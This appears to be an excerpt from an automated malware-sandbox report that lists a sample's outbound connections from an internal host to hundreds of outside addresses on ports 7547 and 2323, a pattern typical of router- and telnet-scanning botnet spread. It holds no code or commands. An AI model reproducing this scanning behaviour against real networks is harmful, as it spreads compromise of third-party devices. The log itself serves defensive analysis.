      Source: unknownNetwork traffic detected: HTTP traffic on port 39736 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 60088 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 47668 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 44994 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 42178 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 34166 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 47622 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 47686 -> 7547
      Source: unknownNetwork traffic detected: HTTP traffic on port 50548 -> 7547
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 144.38.180.55:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 167.107.178.16:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 160.165.32.120:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 156.49.176.215:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 193.51.5.71:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 174.84.69.60:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 96.163.172.32:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 155.130.102.8:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 102.61.117.64:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 176.133.64.66:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 34.59.58.112:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 160.119.41.32:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 149.104.86.28:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 62.9.17.161:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 162.144.157.205:2323
      Source: global trafficTCP traffic: 192.168.2.13:3312 -> 85.20.22.132:2323
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 168.30.180.55:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 198.219.183.55:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 165.239.16.148:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 203.84.99.53:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 218.4.9.0:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 173.66.213.27:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 161.120.27.203:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 178.51.106.237:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 164.23.110.18:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 45.38.44.1:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 95.245.103.118:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 144.24.215.144:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 145.65.108.245:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 58.52.165.16:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 78.190.240.127:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 5.8.101.228:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 20.208.34.62:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 102.191.171.160:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 156.78.209.36:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 207.86.105.37:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 66.163.163.254:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 197.131.140.8:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 95.178.151.109:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 4.230.209.133:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 201.250.120.24:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 34.183.63.81:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 217.144.32.43:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 167.183.152.2:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 182.58.1.242:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 219.44.145.4:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 128.254.238.51:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 194.122.191.22:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 199.58.155.75:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 167.210.14.28:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 216.224.7.248:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 46.158.79.209:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 193.23.8.185:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 23.91.39.87:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 118.8.12.219:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 170.242.186.244:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 110.211.19.120:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 82.217.130.144:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 61.64.58.161:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 188.192.33.17:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 200.216.17.231:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 88.52.144.208:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 43.168.39.9:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 44.213.15.85:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 143.249.137.26:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 143.242.231.169:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 144.182.249.102:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 46.229.152.199:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 75.183.209.41:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 159.248.124.230:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 135.130.179.126:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 163.7.213.125:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 87.74.210.177:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 89.88.8.86:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 164.67.111.183:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 141.151.90.91:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 220.47.31.232:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 183.59.129.150:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 71.254.190.14:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 217.63.48.206:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 157.4.219.114:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 54.8.114.143:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 151.92.176.195:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 63.214.81.242:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 111.181.107.200:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 170.246.41.239:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 60.50.40.24:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 200.220.184.47:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 119.15.235.117:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 207.191.93.18:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 113.16.91.104:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 154.243.140.107:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 179.156.39.112:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 25.180.136.110:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 196.82.25.195:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 94.211.181.228:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 45.86.223.252:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 12.227.129.205:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 36.100.155.213:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 125.224.153.83:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 168.91.93.207:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 49.118.84.185:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 183.17.244.147:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 96.117.154.154:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 87.255.173.58:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 212.189.208.120:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 168.224.216.61:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 50.87.7.55:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 112.195.60.88:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 131.163.155.211:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 125.174.179.196:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 120.40.32.246:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 19.99.100.131:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 149.74.215.82:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 42.60.65.173:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 41.214.75.116:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 5.95.37.45:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 96.15.231.52:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 143.237.119.157:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 161.243.235.100:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 169.58.8.202:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 92.254.223.230:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 69.112.154.114:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 219.166.35.46:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 76.100.145.181:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 105.219.14.114:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 184.47.194.20:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 12.118.64.33:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 13.57.177.246:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 114.47.122.33:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 175.207.252.120:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 60.175.53.254:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 91.240.141.176:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 147.90.211.153:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 143.254.162.221:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 53.239.81.131:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 31.57.47.139:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 37.172.127.205:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 147.39.246.150:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 148.91.112.40:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 205.25.88.14:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 53.247.129.118:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 154.213.66.196:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 50.58.65.83:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 23.132.199.198:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 45.245.47.96:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 57.242.198.109:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 206.245.208.41:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 147.54.210.24:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 36.201.152.12:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 139.110.68.254:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 18.153.71.26:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 4.195.105.237:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 107.210.39.51:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 156.50.214.188:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 203.178.83.49:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 188.211.115.214:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 118.118.99.179:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 193.208.176.98:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 79.239.58.56:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 164.164.4.194:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 47.247.89.33:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 173.155.43.7:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 74.126.53.40:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 217.63.210.64:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 194.176.100.10:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 157.5.156.5:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 19.85.228.239:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 135.52.233.209:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 44.140.45.160:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 123.205.110.122:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 129.60.159.45:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 213.102.107.222:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 109.87.3.104:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 185.95.27.211:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 162.184.209.163:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 140.111.118.67:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 197.29.80.229:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 99.60.222.19:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 57.31.22.27:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 143.36.126.20:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 122.37.71.9:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 203.245.149.142:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 43.83.186.222:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 137.255.119.53:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 45.42.181.84:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 178.83.25.39:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 125.97.133.33:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 38.55.56.162:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 67.130.1.5:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 73.8.68.53:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 27.158.218.31:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 150.51.40.104:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 219.240.183.181:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 133.131.102.58:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 42.225.80.21:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 137.188.91.250:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 201.10.56.55:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 86.246.173.58:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 35.9.133.212:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 201.218.254.48:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 92.235.39.149:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 159.154.180.8:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 5.120.27.38:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 42.24.165.188:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 25.195.78.217:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 153.253.48.53:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 98.8.162.37:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 193.101.71.78:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 176.113.241.87:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 87.112.116.234:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 143.20.52.5:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 209.53.84.20:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 36.156.53.231:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 9.92.143.27:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 98.231.217.134:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 161.104.49.18:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 122.6.91.0:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 137.190.139.207:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 114.117.14.221:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 83.33.0.230:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 198.114.207.222:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 102.183.190.244:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 139.226.41.169:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 161.219.223.194:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 12.242.187.237:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 189.116.101.14:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 146.205.192.84:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 136.155.101.110:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 81.217.191.134:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 122.82.246.186:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 105.218.157.54:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 206.175.69.200:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 138.32.249.164:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 41.149.132.171:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 151.130.41.44:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 142.217.21.179:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 17.214.90.150:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 181.145.248.159:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 67.154.223.116:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 40.244.4.138:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 23.250.76.46:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 45.134.69.66:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 62.246.234.161:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 174.5.136.118:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 207.143.254.155:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 181.254.232.178:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 161.112.138.16:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 76.216.165.50:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 109.87.8.154:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 71.35.26.107:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 93.157.221.47:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 149.229.198.203:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 18.208.110.54:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 5.206.100.61:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 84.34.165.116:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 102.223.247.70:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 207.209.81.34:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 125.194.192.74:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 149.127.49.65:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 1.113.107.184:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 94.10.25.57:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 42.178.122.143:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 137.154.21.117:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 150.159.43.61:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 92.71.13.55:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 145.247.3.152:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 87.171.109.161:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 1.145.112.25:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 75.147.210.179:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 130.125.127.213:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 204.67.131.9:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 217.174.0.91:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 68.107.67.8:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 107.169.79.135:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 24.59.35.41:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 157.232.240.29:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 131.228.93.220:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 166.145.91.198:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 93.217.5.58:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 200.82.169.159:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 191.178.92.67:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 199.48.33.72:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 197.215.242.154:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 17.211.208.78:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 156.91.165.67:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 77.29.129.35:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 133.238.123.52:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 119.238.254.150:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 157.249.210.82:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 218.221.172.64:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 221.141.7.155:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 195.48.157.176:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 49.196.193.139:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 221.17.179.51:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 200.114.159.189:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 58.236.182.82:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 166.87.108.156:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 85.55.214.128:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 169.87.100.137:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 32.218.45.152:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 17.8.239.209:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 179.150.138.150:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 46.106.167.189:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 85.221.170.120:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 130.164.70.223:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 151.4.215.224:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 43.20.114.97:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 154.59.51.205:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 59.6.218.207:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 18.125.64.245:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 32.189.212.17:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 145.209.43.210:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 14.205.204.181:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 70.51.46.4:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 183.137.36.62:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 135.40.180.146:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 184.44.89.65:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 44.0.199.249:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 217.20.231.187:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 159.217.165.27:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 34.47.175.111:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 64.120.131.234:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 78.18.228.213:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 134.224.234.137:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 109.64.158.80:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 80.232.117.65:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 53.218.101.82:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 180.194.139.30:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 175.11.45.189:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 174.222.47.188:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 111.107.162.65:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 60.29.156.35:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 2.219.200.34:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 13.196.247.47:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 75.173.132.152:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 57.100.168.6:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 200.241.201.17:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 116.99.41.102:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 119.90.46.53:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 53.31.57.89:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 66.253.97.139:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 204.78.93.26:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 1.188.231.103:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 146.190.75.64:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 62.223.240.104:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 145.246.45.190:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 78.4.119.250:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 140.190.241.102:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 48.11.177.160:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 89.252.35.164:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 101.45.21.89:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 114.204.163.252:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 104.226.184.97:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 18.132.198.84:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 4.238.58.154:7547
      Source: global trafficTCP traffic: 192.168.2.13:3056 -> 44.147.185.108:7547
